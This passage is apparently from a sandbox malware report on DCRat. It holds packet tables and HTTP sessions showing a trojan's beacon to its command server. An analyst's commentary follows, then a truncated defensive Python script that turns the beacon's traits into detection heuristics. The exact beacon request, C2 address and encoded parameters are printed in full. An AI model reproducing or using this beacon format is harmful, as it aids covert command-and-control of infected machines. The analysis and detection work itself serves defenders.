                                               Nov 27, 2024 04:02:33.486196041 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.486284018 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.490237951 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.534107924 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.566992998 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.584337950 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.704288006 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.027124882 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.027586937 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.027641058 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:34.027751923 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.032632113 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.032727957 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:34.032795906 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.040719032 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.040765047 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:34.041011095 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.049268007 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.049282074 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:34.049313068 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:34.057667017 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                              Nov 27, 2024 04:02:34.057712078 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.057827950 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.066200018 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.066246986 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.227293968 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.229443073 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.163245916 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.537560940 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:41.537657976 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.538192987 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.658508062 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961347103 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961366892 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961410046 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961421013 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961431980 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961483955 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961482048 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:42.961498022 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961534023 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:42.961548090 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961585045 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961585999 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:42.961666107 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961720943 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.081641912 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.088160038 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.088216066 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.101278067 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.103537083 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.223546982 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.559287071 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.559566975 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.559633970 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.559851885 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.568002939 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.568046093 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.568176985 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.576486111 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.576523066 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.576535940 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.584856987 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.584908962 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.584939957 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.593413115 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.593426943 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.593499899 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.769428968 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.770958900 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.674061060 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.794076920 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:49.794215918 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.794919968 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.914830923 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.178966999 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.178983927 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.178996086 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179050922 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179064035 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179076910 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179089069 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179100990 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179124117 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179160118 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179264069 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179275990 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179291010 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179306030 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179331064 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.379973888 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.382492065 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.502360106 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.843673944 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.843702078 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.843909979 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.847856998 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.847980022 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.848030090 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.856251001 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.856324911 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.856369972 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.864661932 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.864775896 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.864821911 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.873078108 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.873307943 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.873352051 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.874850988 CET4982780192.168.2.9188.120.228.203
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 04:01:57.871406078 CET | 1.1.1.1 | 192.168.2.9 | 0x6a7f | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 04:01:57.871406078 CET | 1.1.1.1 | 192.168.2.9 | 0x6a7f | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                              • 188.120.228.203
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49723 | 188.120.228.203 | 80 | 7604 | C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 04:02:06.299420118 CET | 765 | OUT | GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
Nov 27, 2024 04:02:07.712311983 CET | 1236 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:
Nov 27, 2024 04:02:07.712337017 CET | 465 | IN | Data Raw: 31 30 30 25 7d 62 75 74 74 6f 6e 2c 6f 70 74 69 6f 6e 2c 73 65 6c 65 63 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 75 6c 20 6c
                                              Data Ascii: 100%}button,option,select{cursor:pointer}a{color:inherit;text-decoration:none}ul li{list-style:none}img{vertical-align:top}h1,h2,h3,h4,h5,h6{font-weight:inherit;font-size:inherit}.lock body{overflow:hidden;touch-action:none;-ms-scroll-chaining
Nov 27, 2024 04:02:07.712476015 CET | 1236 | IN | Data Raw: 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69
                                              Data Ascii: r;justify-content:center;min-height:100vh;min-width:100vw;padding:1rem}.window-main{background-color:#13151a;border-radius:.75rem;max-width:45.625rem}.window-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-
Nov 27, 2024 04:02:07.712554932 CET | 1236 | IN | Data Raw: 64 64 69 6e 67 3a 33 2e 37 35 72 65 6d 20 38 2e 39 33 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 62 6f 64 79 7b 66
                                              Data Ascii: dding:3.75rem 8.9375rem}.window-main__title{font-size:2.25rem}.window-main__body{font-size:1.0625rem}.window-main__info{margin-bottom:1.875rem}.window-main__list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:
Nov 27, 2024 04:02:07.712569952 CET | 1236 | IN | Data Raw: 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 72 69 67
                                              Data Ascii: p(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp
Nov 27, 2024 04:02:07.712650061 CET | 672 | IN | Data Raw: 38 35 33 36 36 72 65 6d 20 2b 20 2e 37 33 31 37 30 37 33 31 37 31 76 77 20 2c 31 2e 30 36 32 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 30 2e 38 37 35 72 65 6d 20 2c 30 2e 37
                                              Data Ascii: 85366rem + .7317073171vw ,1.0625rem)}}@supports not (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:calc(.875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2
Nov 27, 2024 04:02:07.712729931 CET | 1236 | IN | Data Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
Nov 27, 2024 04:02:07.712806940 CET | 1236 | IN | Data Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
Nov 27, 2024 04:02:07.712817907 CET | 1236 | IN | Data Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                                              Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
Nov 27, 2024 04:02:07.712830067 CET | 1236 | IN | Data Raw: 73 20 70 6f 69 6e 74 65 64 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 65 72 65 20 69 73 20 6e 6f 20 73 69 74 65 20 77 69 74 68 20 74 68 61 74 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e
                                              Data Ascii: s pointed to the server, but there is no site with that domain name on the server.</li><li class="window-main__item">You are accessing the site via HTTPS, but the site does not have an SSL certificate installed.</li><li class="
Nov 27, 2024 04:02:07.833177090 CET | 896 | IN | Data Raw: 3d 22 66 69 6c 74 65 72 30 5f 66 5f 32 30 30 31 5f 31 30 22 20 78 3d 22 30 2e 37 30 39 39 36 31 22 20 79 3d 22 32 30 38 2e 36 32 36 22 20 77 69 64 74 68 3d 22 35 31 30 2e 32 32 22 20 68 65 69 67 68 74 3d 22 35 38 30 2e 34 37 37 22 20 66 69 6c 74
                                              Data Ascii: ="filter0_f_2001_10" x="0.709961" y="208.626" width="510.22" height="580.477" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in=
Nov 27, 2024 04:02:07.927748919 CET | 741 | OUT | GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1
                                              Host: 188.120.228.203
Nov 27, 2024 04:02:08.378654003 CET | 1236 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:
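Session 0 is the DCRat beacon as it looks on the wire, and the same shape recurs in Session 1 from the second dropped executable: a GET to a very long word-salad path ending in defaultuniversal.php, a Content-Type header on a request that carries no body, a phone User-Agent (iPhone here, Android in Session 1) sent from a Windows process, a bare-IP Host header, the same two key=value pairs (ffd48bee...=0e446e... and bb9ca7...=gNllDM...) in every request, and the remaining pairs repeated twice inside one query string. The process behind Session 0 is WerFault.exe running from C:\Windows\SysWOW64\MsRdpWebAccess\, not from SysWOW64 itself. On the reply side all three responses are the same nginx static file (Content-Length 11694, ETag "66e176fd-2dae"): the FASTPANEL placeholder page whose text says there is no site with that name on the server. The sandbox therefore recorded the beacon format but no tasking from the server.

The Python below is an added example, not code from the Joe Sandbox report or from DCRat, that turns those observable features into triage heuristics a SOC could run over proxy logs or a pcap. SESSION0_* is copied from the capture above; BENIGN_* is a constructed contrast case. The thresholds, the list of system binary names, and the reading of the constant bb9ca7... value as reversed base64 are the author's assumptions: that value decodes cleanly to a 40-character hex string, but the report does not say what it identifies.

```python
"""Triage heuristics for the captured DCRat HTTP sessions (added example, not from
the Joe Sandbox report or from DCRat). SESSION0_* is copied from Session 0 above;
BENIGN_* is constructed. Thresholds, the system-binary list and the reversed-base64
reading of the constant query parameter are the author's assumptions."""
import base64
import ntpath
import re
from urllib.parse import parse_qsl, urlsplit

SYSTEM_BINARY_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}  # assumed default layout
SYSTEM_BINARY_NAMES = {"werfault.exe", "svchost.exe", "lsass.exe", "csrss.exe"}
MOBILE_UA = re.compile(r"iPhone|Android", re.I)
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

SESSION0_PROCESS = r"C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
SESSION0_REQUEST = (
    "GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/"
    "Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php"
    "?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI"
    "&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694"
    "&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO"
    "&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI"
    " HTTP/1.1\r\nAccept: */*\r\nContent-Type: text/css\r\n"
    "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 "
    "(KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1\r\n"
    "Host: 188.120.228.203\r\nConnection: Keep-Alive\r\n"
)
SESSION0_RESPONSE_HEADERS = (
    "HTTP/1.1 200 OK\r\nServer: nginx/1.24.0\r\nContent-Type: text/html\r\nContent-Length: 11694\r\n"
    'Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT\r\nETag: "66e176fd-2dae"\r\n'
)
BENIGN_PROCESS = r"C:\Program Files\Mozilla Firefox\firefox.exe"  # constructed contrast case
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/131.0\r\nAccept: text/html\r\n"
)


def parse_message(raw):
    """Split a raw request/response head into (first line, {lower-cased header: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def reversed_base64_hex(value):
    """Decode value as reversed base64; return the text only if it is a 32..64 char hex string."""
    s = value[::-1]
    s += "=" * (-len(s) % 4)  # restore the padding the sender stripped
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except ValueError:  # bad alphabet, bad padding or non-ASCII output
        return None
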